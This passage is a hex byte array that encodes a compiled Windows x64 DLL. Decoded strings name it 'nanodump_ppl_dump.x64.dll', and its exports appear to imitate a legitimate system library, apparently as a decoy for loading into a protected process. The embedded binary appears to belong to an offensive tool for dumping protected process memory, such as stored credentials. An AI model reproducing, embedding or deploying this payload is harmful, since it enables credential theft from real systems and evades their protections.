,0x04,0x03,0x01,0x50,0x00,0x00,0x01,0x10,0x04,0x85,0x10,0x03,0x08,0x01,0x46,0x00,0x01,0x50,0x01,0x08,0x03,0x05,0x08,0x32,0x04,0x03,0x01,0x50,0x00,0x00,0x01,0x0B,0x04,0x05,0x0B,0x01,0x18,0x00,0x04,0x03,0x01,0x50,0x01,0x0B,0x04,0x05,0x0B,0x01,0x16,0x00,0x04,0x03,0x01,0x50,0x01,0x11,0x05,0x85,0x11,0x03,0x09,0x01,0x51,0x00,0x02,0x70,0x01,0x50,0x00,0x00,0x01,0x11,0x05,0x85,0x11,0x03,0x09,0x01,0x5B,0x00,0x02,0x70,0x01,0x50,0x00,0x00,0x01,0x11,0x05,0x85,0x11,0x03,0x09,0x01,0x5B,0x00,0x02,0x70,0x01,0x50,0x00,0x00,0x01,0x08,0x03,0x05,0x08,0x72,0x04,0x03,0x01,0x50,0x00,0x00,0x01,0x08,0x03,0x05,0x08,0x72,0x04,0x03,0x01,0x50,0x00,0x00,0x01,0x08,0x03,0x05,0x08,0x72,0x04,0x03,0x01,0x50,0x00,0x00,0x01,0x04,0x02,0x05,0x04,0x03,0x01,0x50,0x01,0x08,0x03,0x05,0x08,0x52,0x04,0x03,0x01,0x50,0x00,0x00,0x01,0x08,0x03,0x05,0x08,0x52,0x04,0x03,0x01,0x50,0x00,0x00,0x01,0x08,0x03,0x05,0x08,0x52,0x04,0x03,0x01,0x50,0x00,0x00,0x01,0x0B,0x04,0x25,0x0B,0x03,0x06,0x42,0x02,0x30,0x01,0x50,0x01,0x0B,0x04,0x55,0x0B,0x03,0x06,0xA2,0x02,0x30,0x01,0x50,0x01,0x08,0x03,0x05,0x08,0xD2,0x04,0x03,0x01,0x50,0x00,0x00,0x01,0x08,0x03,0x05,0x08,0xD2,0x04,0x03,0x01,0x50,0x00,0x00,0x01,0x0B,0x04,0x45,0x0B,0x03,0x06,0x82,0x02,0x30,0x01,0x50,0x01,0x08,0x03,0x05,0x08,0x52,0x04,0x03,0x01,0x50,0x00,0x00,0x01,0x08,0x03,0x05,0x08,0x52,0x04,0x03,0x01,0x50,0x00,0x00,0x01,0x08,0x03,0x05,0x08,0x52,0x04,0x03,0x01,0x50,0x00,0x00,0x01,0x08,0x03,0x05,0x08,0x32,0x04,0x03,0x01,0x50,0x00,0x00,0x01,0x08,0x03,0x05,0x08,0xB2,0x04,0x03,0x01,0x50,0x00,0x00,0x01,0x11,0x05,0x85,0x11,0x03,0x09,0x01,0x6D,0x00,0x02,0x70,0x01,0x50,0x00,0x00,0x01,0x08,0x03,0x05,0x08,0xF2,0x04,0x03,0x01,0x50,0x00,0x00,0x01,0x08,0x03,0x05,0x08,0xF2,0x04,0x03,0x01,0x50,0x00,0x00,0x01,0x0B,0x04,0x55,0x0B,0x03,0x06,0xA2,0x02,0x30,0x01,0x50,0x01,0x0B,0x04,0x55,0x0B,0x03,0x06,0xA2,0x02,0x30,0x01,0x50,0x01,0x0B,0x04,0x55,0x0B,0x03,0x06,0xA2,0x02,0x30,0x01,0x50,0x01,0x08,0x03,0x05,0x08,0xD2,0x04,0x03,0x01,0x50,0x00,0x00,0x01,0x08,0x03,0x05,0x08,0x92,0x04,0x03,0x01,0x50,0x00,0x00,0x01,0x08,0x03,0x05,0x08,0xB2,0x04,0x03,0x01,0x50,0x00,0x00,0x01,0x08,0x03,0x05,0x08,0x32,0x04,0x03,0x01,0x50,0x00,0x00,0x01,0x08,0x03,0x05,0x08,0x32,0x04,0x03,0x01,0x50,0x00,0x00,0x01,0x08,0x03,0x05,0x08,0x32,0x04,0x03,0x01,0x50,0x00,0x00,0x01,0x08,0x03,0x05,0x08,0xD2,0x04,0x03,0x01,0x50,0x00,0x00,0x01,0x08,0x03,0x05,0x08,0x52,0x04,0x03,0x01,0x50,0x00,0x00,0x01,0x08,0x03,0x05,0x08,0x72,0x04,0x03,0x01,0x50,0x00,0x00,0x01,0x08,0x03,0x05,0x08,0xD2,0x04,0x03,0x01,0x50,0x00,0x00,0x01,0x0B,0x04,0x45,0x0B,0x03,0x06,0x82,0x02,0x30,0x01,0x50,0x01,0x08,0x03,0x05,0x08,0x12,0x04,0x03,0x01,0x50,0x00,0x00,0x01,0x08,0x03,0x05,0x08,0x72,0x04,0x03,0x01,0x50,0x00,0x00,0x01,0x0B,0x04,0x55,0x0B,0x03,0x06,0xA2,0x02,0x30,0x01,0x50,0x01,0x0B,0x04,0x55,0x0B,0x03,0x06,0xA2,0x02,0x30,0x01,0x50,0x01,0x11,0x05,0xB5,0x11,0x03,0x09,0x01,0x17,0x00,0x02,0x30,0x01,0x50,0x00,0x00,0x01,0x0B,0x04,0x05,0x0B,0x01,0x12,0x00,0x04,0x03,0x01,0x50,0x01,0x08,0x03,0x05,0x08,0x92,0x04,0x03,0x01,0x50,0x00,0x00,0x01,0x08,0x03,0x05,0x08,0x52,0x04,0x03,0x01,0x50,0x00,0x00,0x01,0x08,0x03,0x05,0x08,0x72,0x04,0x03,0x01,0x50,0x00,0x00,0x01,0x08,0x03,0x05,0x08,0x52,0x04,0x03,0x01,0x50,0x00,0x00,0x01,0x11,0x05,0x85,0x11,0x03,0x09,0x01,0x25,0x00,0x02,0x30,0x01,0x50,0x00,0x00,0x01,0x08,0x03,0x05,0x08,0x52,0x04,0x03,0x01,0x50,0x00,0x00,0x01,0x0B,0x04,0x05,0x0B,0x01,0x1C,0x00,0x04,0x03,0x01,0x50,0x01,0x08,0x03,0x05,0x08,0x72,0x04,0x03,0x01,0x50,0x00,0x00,0x01,0x08,0x03,0x05,0x08,0x52,0x04,0x03,0x01,0x50,0x00,0x00,0x01,0x0B,0x04,0x65,0x0B,0x03,0x06,0xC2,0x02,0x30,0x01,0x50,0x01,0x08,0x03,0x05,0x08,0x72,0x04,0x03,0x01,0x50,0x00,0x00,0x01,0x08,0x03,0x05,0x08,0x72,0x04,0x03,0x01,0x50,0x00,0x00,0x01,0x08,0x03,0x05,0x08,0x92,0x04,0x03,0x01,0x50,0x00,0x00,0x01,0x0B,0x04,0x55,0x0B,0x03,0x06,0xA2,0x02,0x30,0x01,0x50,0x01,0x12,0x06,0x85,0x12,0x03,0x0A,0x01,0x8E,0x00,0x03,0x30,0x02,0x70,0x01,0x50,0x01,0x08,0x03,0x05,0x08,0xD2,0x04,0x03,0x01,0x50,0x00,0x00,0x01,0x08,0x03,0x05,0x08,0xB2,0x04,0x03,0x01,0x50,0x00,0x00,0x01,0x08,0x03,0x05,0x08,0x72,0x04,0x03,0x01,0x50,0x00,0x00,0x01,0x08,0x03,0x05,0x08,0x72,0x04,0x03,0x01,0x50,0x00,0x00,0x01,0x10,0x04,0x85,0x10,0x03,0x08,0x01,0x74,0x00,0x01,0x50,0x01,0x00,0x00,0x00,0x01,0x08,0x03,0x05,0x08,0x32,0x04,0x03,0x01,0x50,0x00,0x00,0x01,0x08,0x03,0x05,0x08,0x72,0x04,0x03,0x01,0x50,0x00,0x00,0x01,0x08,0x03,0x05,0x08,0x12,0x04,0x03,0x01,0x50,0x00,0x00,0x01,0x11,0x05,0xE5,0x11,0x03,0x09,0x01,0x1D,0x00,0x02,0x30,0x01,0x50,0x00,0x00,0x01,0x08,0x03,0x05,0x08,0x52,0x04,0x03,0x01,0x50,0x00,0x00,0x01,0x08,0x03,0x05,0x08,0x52,0x04,0x03,0x01,0x50,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x08,0x03,0x05,0x08,0x52,0x04,0x03,0x01,0x50,0x00,0x00,0x01,0x08,0x03,0x05,0x08,0x52,0x04,0x03,0x01,0x50,0x00,0x00,0x01,0x08,0x03,0x05,0x08,0x52,0x04,0x03,0x01,0x50,0x00,0x00,0x01,0x11,0x05,0xB5,0x11,0x03,0x09,0x01,0x17,0x00,0x02,0x30,0x01,0x50,0x00,0x00,0x01,0x08,0x03,0x05,0x08,0x52,0x04,0x03,0x01,0x50,0x00,0x00,0x01,0x08,0x03,0x05,0x08,0x52,0x04,0x03,0x01,0x50,0x00,0x00,0x01,0x08,0x03,0x05,0x08,0xD2,0x04,0x03,0x01,0x50,0x00,0x00,0x01,0x0B,0x04,0x35,0x0B,0x03,0x06,0x62,0x02,0x30,0x01,0x50,0x01,0x08,0x03,0x05,0x08,0xB2,0x04,0x03,0x01,0x50,0x00,0x00,0x01,0x0B,0x04,0x05,0x0B,0x01,0x1C,0x00,0x04,0x03,0x01,0x50,0x01,0x11,0x05,0x85,0x11,0x03,0x09,0x01,0x3B,0x00,0x02,0x70,0x01,0x50,0x00,0x00,0x01,0x08,0x03,0x05,0x08,0x12,0x04,0x03,0x01,0x50,0x00,0x00,0x01,0x0B,0x04,0x05,0x0B,0x01,0x14,0x00,0x04,0x03,0x01,0x50,0x01,0x0B,0x04,0x75,0x0B,0x03,0x06,0xE2,0x02,0x30,0x01,0x50,0x01,0x08,0x03,0x05,0x08,0x52,0x04,0x03,0x01,0x50,0x00,0x00,0x01,0x11,0x05,0x85,0x11,0x03,0x09,0x01,0x89,0x00,0x02,0x70,0x01,0x50,0x00,0x00,0x01,0x08,0x03,0x05,0x08,0x32,0x04,0x03,0x01,0x50,0x00,0x00,0x01,0x04,0x02,0x05,0x04,0x03,0x01,0x50,0x01,0x04,0x02,0x05,0x04,0x03,0x01,0x50,0x01,0x04,0x02,0x05,0x04,0x03,0x01,0x50,0x01,0x04,0x02,0x05,0x04,0x03,0x01,0x50,0x01,0x04,0x02,0x05,0x04,0x03,0x01,0x50,0x01,0x04,0x02,0x05,0x04,0x03,0x01,0x50,0x01,0x04,0x02,0x05,0x04,0x03,0x01,0x50,0x01,0x04,0x02,0x05,0x04,0x03,0x01,0x50,0x01,0x04,0x02,0x05,0x04,0x03,0x01,0x50,0x01,0x04,0x02,0x05,0x04,0x03,0x01,0x50,0x01,0x08,0x03,0x05,0x08,0x32,0x04,0x03,0x01,0x50,0x00,0x00,0x01,0x0C,0x05,0x25,0x0C,0x03,0x07,0x32,0x03,0x30,0x02,0x60,0x01,0x50,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x08,0x03,0x05,0x08,0x32,0x04,0x03,0x01,0x50,0x00,0x00,0x01,0x0C,0x05,0x25,0x0C,0x03,0x07,0x32,0x03,0x30,0x02,0x60,0x01,0x50,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x0C,0x05,0x35,0x0C,0x03,0x07,0x52,0x03,0x30,0x02,0x60,0x01,0x50,0x00,0x00,0x01,0x0D,0x06,0x55,0x0D,0x03,0x08,0xA2,0x04,0x30,0x03,0x60,0x02,0x70,0x01,0x50,0x01,0x15,0x0A,0x45,0x15,0x03,0x10,0x82,0x0C,0x30,0x0B,0x60,0x0A,0x70,0x09,0xC0,0x07,0xD0,0x05,0xE0,0x03,0xF0,0x01,0x50,0x01,0x11,0x08,0x25,0x11,0x03,0x0C,0x42,0x08,0x30,0x07,0x60,0x06,0x70,0x05,0xC0,0x03,0xD0,0x01,0x50,0x01,0x0D,0x06,0x25,0x0D,0x03,0x08,0x42,0x04,0x30,0x03,0x60,0x02,0x70,0x01,0x50,0x01,0x0C,0x05,0x25,0x0C,0x03,0x07,0x32,0x03,0x30,0x02,0x60,0x01,0x50,0x00,0x00,0x01,0x0B,0x04,0x25,0x0B,0x03,0x06,0x42,0x02,0x30,0x01,0x50,0x01,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x0D,0x06,0x25,0x0D,0x03,0x08,0x42,0x04,0x30,0x03,0x60,0x02,0x70,0x01,0x50,0x01,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x0C,0x05,0x35,0x0C,0x03,0x07,0x52,0x03,0x30,0x02,0x60,0x01,0x50,0x00,0x00,0x01,0x0C,0x05,0x35,0x0C,0x03,0x07,0x52,0x03,0x30,0x02,0x60,0x01,0x50,0x00,0x00,0x01,0x0B,0x04,0x25,0x0B,0x03,0x06,0x42,0x02,0x30,0x01,0x50,0x01,0x00,0x00,0x00,0x01,0x0F,0x07,0x25,0x0F,0x03,0x0A,0x32,0x06,0x30,0x05,0x60,0x04,0x70,0x03,0xC0,0x01,0x50,0x00,0x00,0x01,0x0D,0x06,0x25,0x0D,0x03,0x08,0x42,0x04,0x30,0x03,0x60,0x02,0x70,0x01,0x50,0x01,0x0F,0x07,0x25,0x0F,0x03,0x0A,0x32,0x06,0x30,0x05,0x60,0x04,0x70,0x03,0xC0,0x01,0x50,0x00,0x00,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x96,0x79,0x7A,0x68,0x00,0x00,0x00,0x00,0x96,0x80,0x01,0x00,0x01,0x00,0x00,0x00,0x0B,0x00,0x00,0x00,0x0B,0x00,0x00,0x00,0x28,0x80,0x01,0x00,0x54,0x80,0x01,0x00,0x80,0x80,0x01,0x00,0x35,0xDE,0x00,0x00,0x3C,0xDE,0x00,0x00,0xDE,0xDD,0x00,0x00,0x4A,0xDE,0x00,0x00,0x6D,0xDE,0x00,0x00,0x58,0xDE,0x00,0x00,0x43,0xDE,0x00,0x00,0x66,0xDE,0x00,0x00,0x5F,0xDE,0x00,0x00,0x51,0xDE,0x00,0x00,0x2E,0xDE,0x00,0x00,0xB0,0x80,0x01,0x00,0xC7,0x80,0x01,0x00,0xDE,0x80,0x01,0x00,0xE6,0x80,0x01,0x00,0xFD,0x80,0x01,0x00,0x14,0x81,0x01,0x00,0x2E,0x81,0x01,0x00,0x46,0x81,0x01,0x00,0x5E,0x81,0x01,0x00,0x7E,0x81,0x01,0x00,0x9F,0x81,0x01,0x00,0x00,0x00,0x01,0x00,0x02,0x00,0x03,0x00,0x04,0x00,0x05,0x00,0x06,0x00,0x07,0x00,0x08,0x00,0x09,0x00,0x0A,0x00,0x6E,0x61,0x6E,0x6F,0x64,0x75,0x6D,0x70,0x5F,0x70,0x70,0x6C,0x5F,0x64,0x75,0x6D,0x70,0x2E,0x78,0x36,0x34,0x2E,0x64,0x6C,0x6C,0x00,0x42,0x72,0x69,0x43,0x72,0x65,0x61,0x74,0x65,0x42,0x72,0x6F,0x6B,0x65,0x72,0x65,0x64,0x45,0x76,0x65,0x6E,0x74,0x00,0x42,0x72,0x69,0x44,0x65,0x6C,0x65,0x74,0x65,0x42,0x72,0x6F,0x6B,0x65,0x72,0x65,0x64,0x45,0x76,0x65,0x6E,0x74,0x00,0x44,0x6C,0x6C,0x4D,0x61,0x69,0x6E,0x00,0x45,0x41,0x43,0x72,0x65,0x61,0x74,0x65,0x41,0x67,0x67,0x72,0x65,0x67,0x61,0x74,0x65,0x45,0x76,0x65,0x6E,0x74,0x00,0x45,0x41,0x44,0x65,0x6C,0x65,0x74,0x65,0x41,0x67,0x67,0x72,0x65,0x67,0x61,0x74,0x65,0x45,0x76,0x65,0x6E,0x74,0x00,0x45,0x41,0x51,0x75,0x65,0x72,0x79,0x41,0x67,0x67,0x72,0x65,0x67,0x61,0x74,0x65,0x45,0x76,0x65,0x6E,0x74,0x44,0x61,0x74,0x61,0x00,0x45,0x61,0x43,0x72,0x65,0x61,0x74,0x65,0x41,0x67,0x67,0x72,0x65,0x67,0x61,0x74,0x65,0x64,0x45,0x76,0x65,0x6E,0x74,0x00,0x45,0x61,0x44,0x65,0x6C,0x65,0x74,0x65,0x41,0x67,0x67,0x72,0x65,0x67,0x61,0x74,0x65,0x64,0x45,0x76,0x65,0x6E,0x74,0x00,0x45,0x61,0x46,0x72,0x65,0x65,0x41,0x67,0x67,0x72,0x65,0x67,0x61,0x74,0x65,0x64,0x45,0x76,0x65,0x6E,0x74,0x50,0x61,0x72,0x61,0x6D,0x65,0x74,0x65,0x72,0x73,0x00,0x45,0x61,0x51,0x75,0x65,0x72,0x79,0x41,0x67,0x67,0x72,0x65,0x67,0x61,0x74,0x65,0x64,0x45,0x76,0x65,0x6E,0x74,0x50,0x61,0x72,0x61,0x6D,0x65,0x74,0x65,0x72,0x73,0x00,0x4C,0x6F,0x67,0x6F,0x6E,0x55,0x73,0x65,0x72,0x45,0x78,0x45,0x78,0x57,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x40,0x90,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x8C,0x96,0x01,0x00,0xF0,0x91,0x01,0x00,0xE0,0x90,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x20,0x97,0x01,0x00,0x90,0x92,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xA0,0x93,0x01,0x00,0x00,0x00,0x00,0x00,0xB0,0x93,0x01,0x00,0x00,0x00,0x00,0x00,0xC8,0x93,0x01,0x00,0x00,0x00,0x00,0x00,0xE0,0x93,0x01,0x00,0x00,0x00,0x00,0x00,0xF0,0x93,0x01,0x00,0x00,0x00,0x00,0x00,0x04,0x94,0x01,0x00,0x00,0x00,0x00,0x00,0x16,0x94,0x01,0x00,0x00,0x00,0x00,0x00,0x28,0x94,0x01,0x00,0x00,0x00,0x00,0x00,0x38,0x94,0x01,0x00,0x00,0x00,0x00,0x00,0x44,0x94,0x01,0x00,0x00,0x00,0x00,0x00,0x50,0x94,0x01,0x00,0x00,0x00,0x00,0x00,0x6C,0x94,0x01,0x00,0x00,0x00,0x00,0x00,0x84,0x94,0x01,0x00,0x00,0x00,0x00,0x00,0x92,0x94,0x01,0x00,0x00,0x00,0x00,0x00,0x9E,0x94,0x01,0x00,0x00,0x00,0x00,0x00,0xA6,0x94,0x01,0x00,0x00,0x00,0x00,0x00,0xB4,0x94,0x01,0x00,0x00,0x00,0x00,0x00,0xC6,0x94,0x01,0x00,0x00,0x00,0x00,0x00,0xD6,0x94,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xE6,0x94,0x01,0x00,0x00,0x00,0x00,0x00,0xF4,0x94,0x01,0x00,0x00,0x00,0x00,0x00,0x02,0x95,0x01,0x00,0x00,0x00,0x00,0x00,0x0E,0x95,0x01,0x00,0x00,0x00,0x00,0x00,0x16,0x95,0x01,0x00,0x00,0x00,0x00,0x00,0x20,0x95,0x01,0x00,0x00,0x00,0x00,0x00,0x2A,0x95,0x01,0x00,0x00,0x00,0x00,0x00,0x38,0x95,0x01,0x00,0x00,0x00,0x00,0x00,0x46,0x95,0x01,0x00,0x00,0x00,0x00,0x00,0x52,0x95,0x01,0x00,0x00,0x00,0x00,0x00,0x5A,0x95,0x01,0x00,0x00,0x00,0x00,0x00,0x64,0x95,0x01,0x00,0x00,0x00,0x00,0x00,0x6C,0x95,0x01,0x00,0x00,0x00,0x00,0x00,0x76,0x95,0x01,0x00,0x00,0x00,0x00,0x00,0x82,0x95,0x01,0x00,0x00,0x00,0x00,0x00,0x8C,0x95,0x01,0x00,0x00,0x00,0x00,0x00,0x96,0x95,0x01,0x00,0x00,0x00,0x00,0x00,0xA0,0x95,0x01,0x00,0x00,0x00,0x00,0x00,0xA8,0x95,0x01,0x00,0x00,0x00,0x00,0x00,0xB2,0x95,0x01,0x00,0x00,0x00,0x00,0x00,0xBA,0x95,0x01,0x00,0x00,0x00,0x00,0x00,0xC4,0x95,0x01,0x00,0x00,0x00,0x00,0x00,0xCE,0x95,0x01,0x00,0x00,0x00,0x00,0x00,0xD8,0x95,0x01,0x00,0x00,0x00,0x00,0x00,0xE2,0x95,0x01,0x00,0x00,0x00,0x00,0x00,0xEC,0x95,0x01,0x00,0x00,0x00,0x00,0x00,0xF8,0x95,0x01,0x00,0x00,0x00,0x00,0x00,0x02,0x96,0x01,0x00,0x00,0x00,0x00,0x00,0x0C,0x96,0x01,0x00,0x00,0x00,0x00,0x00,0x16,0x96,0x01,0x00,0x00,0x00,0x00,0x00,0x20,0x96,0x01,0x00,0x00,0x00,0x00,0x00,0x2A,0x96,0x01,0x00,0x00,0x00,0x00,0x00,0x36,0x96,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xA0,0x93,0x01,0x00,0x00,0x00,0x00,0x00,0xB0,0x93,0x01,0x00,0x00,0x00,0x00,0x00,0xC8,0x93,0x01,0x00,0x00,0x00,0x00,0x00,0xE0,0x93,0x01,0x00,0x00,0x00,0x00,0x00,0xF0,0x93,0x01,0x00,0x00,0x00,0x00,0x00,0x04,0x94,0x01,0x00,0x00,0x00,0x00,0x00,0x16,0x94,0x01,0x00,0x00,0x00,0x00,0x00,0x28,0x94,0x01,0x00,0x00,0x00,0x00,0x00,0x38,0x94,0x01,0x00,0x00,0x00,0x00,0x00,0x44,0x94,0x01,0x00,0x00,0x00,0x00,0x00,0x50,0x94,0x01,0x00,0x00,0x00,0x00,0x00,0x6C,0x94,0x01,0x00,0x00,0x00,0x00,0x00,0x84,0x94,0x01,0x00,0x00,0x00,0x00,0x00,0x92,0x94,0x01,0x00,0x00,0x00,0x00,0x00,0x9E,0x94,0x01,0x00,0x00,0x00,0x00,0x00,0xA6,0x94,0x01,0x00,0x00,0x00,0x00,0x00,0xB4,0x94,0x01,0x00,0x00,0x00,0x00,0x00,0xC6,0x94,0x01,0x00,0x00,0x00,0x00,0x00,0xD6,0x94,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xE6,0x94,0x01,0x00,0x00,0x00,0x00,0x00,0xF4,0x94,0x01,0x00,0x00,0x00,0x00,0x00,0x02,0x95,0x01,0x00,0x00,0x00,0x00,0x00,0x0E,0x95,0x01,0x00,0x00,0x00,0x00,0x00,0x16,0x95,0x01,0x00,0x00,0x00,0x00,0x00,0x20,0x95,0x01,0x00,0x00,0x00,0x00,0x00,0x2A,0x95,0x01,0x00,0x00,0x00,0x00,0x00,0x38,0x95,0x01,0x00,0x00,0x00,0x00,0x00,0x46,0x95,0x01,0x00,0x00,0x00,0x00,0x00,0x52,0x95,0x01,0x00,0x00,0x00,0x00,0x00,0x5A,0x95,0x01,0x00,0x00,0x00,0x00,0x00,0x64,0x95,0x01,0x00,0x00,0x00,0x00,0x00,0x6C,0x95,0x01,0x00,0x00,0x00,0x00,0x00,0x76,0x95,0x01,0x00,0x00,0x00,0x00,0x00,0x82,0x95,0x01,0x00,0x00,0x00,0x00,0x00,0x8C,0x95,0x01,0x00,0x00,0x00,0x00,0x00,0x96,0x95,0x01,0x00,0x00,0x00,0x00,0x00,0xA0,0x95,0x01,0x00,0x00,0x00,0x00,0x00,0xA8,0x95,0x01,0x00,0x00,0x00,0x00,0x00,0xB2,0x95,0x01,0x00,0x00,0x00,0x00,0x00,0xBA,0x95,0x01,0x00,0x00,0x00,0x00,0x00,0xC4,0x95,0x01,0x00,0x00,0x00,0x00,0x00,0xCE,0x95,0x01,0x00,0x00,0x00,0x00,0x00,0xD8,0x95,0x01,0x00,0x00,0x00,0x00,0x00,0xE2,0x95,0x01,0x00,0x00,0x00,0x00,0x00,0xEC,0x95,0x01,0x00,0x00,0x00,0x00,0x00,0xF8,0x95,0x01,0x00,0x00,0x00,0x00,0x00,0x02,0x96,0x01,0x00,0x00,0x00,0x00,0x00,0x0C,0x96,0x01,0x00,0x00,0x00,0x00,0x00,0x16,0x96,0x01,0x00,0x00,0x00,0x00,0x00,0x20,0x96,0x01,0x00,0x00,0x00,0x00,0x00,0x2A,0x96,0x01,0x00,0x00,0x00,0x00,0x00,0x36,0x96,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x26,0x00,0x41,0x74,0x74,0x61,0x63,0x68,0x43,0x6F,0x6E,0x73,0x6F,0x6C,0x65,0x00,0x19,0x01,0x44,0x65,0x6C,0x65,0x74,0x65,0x43,0x72,0x69,0x74,0x69,0x63,0x61,0x6C,0x53,0x65,0x63,0x74,0x69,0x6F,0x6E,0x00,0x3D,0x01,0x45,0x6E,0x74,0x65,0x72,0x43,0x72,0x69,0x74,0x69,0x63,0x61,0x6C,0x53,0x65,0x63,0x74,0x69,0x6F,0x6E,0x00,0x00,0x74,0x02,0x47,0x65,0x74,0x4C,0x61,0x73,0x74,0x45,0x72,0x72,0x6F,0x72,0x00,0x00,0x8C,0x02,0x47,0x65,0x74,0x4D,0x6F,0x64,0x75,0x6C,0x65,0x48,0x61,0x6E,0x64,0x6C,0x65,0x57,0x00,0x00,0xC4,0x02,0x47,0x65,0x74,0x50,0x72,0x6F,0x63,0x41,0x64,0x64,0x72,0x65,0x73,0x73,0x00,0x00,0xCA,0x02,0x47,0x65,0x74,0x50,0x72,0x6F,0x63,0x65,0x73,0x73,0x48,0x65,0x61,0x70,0x00,0x00,0xE8,0x02,0x47,0x65,0x74,0x53,0x74,0x64,0x48,0x61,0x6E,0x64,0x6C,0x65,0x00,0x00,0x5D,0x03,0x48,0x65,0x61,0x70,0x41,0x6C,0x6C,0x6F,0x63,0x00,0x63,0x03,0x48,0x65,0x61,0x70,0x46,0x72,0x65,0x65,0x00,0x00,0x7A,0x03,0x49,0x6E,0x69,0x74,0x69,0x61,0x6C,0x69,0x7A,0x65,0x43,0x72,0x69,0x74,0x69,0x63,0x61,0x6C,0x53,0x65,0x63,0x74,0x69,0x6F,0x6E,0x00,0xD6,0x03,0x4C,0x65,0x61,0x76,0x65,0x43,0x72,0x69,0x74,0x69,0x63,0x61,0x6C,0x53,0x65,0x63,0x74,0x69,0x6F,0x6E,0x00,0x00,0xE3,0x03,0x4C,0x6F,0x63,0x61,0x6C,0x41,0x6C,0x6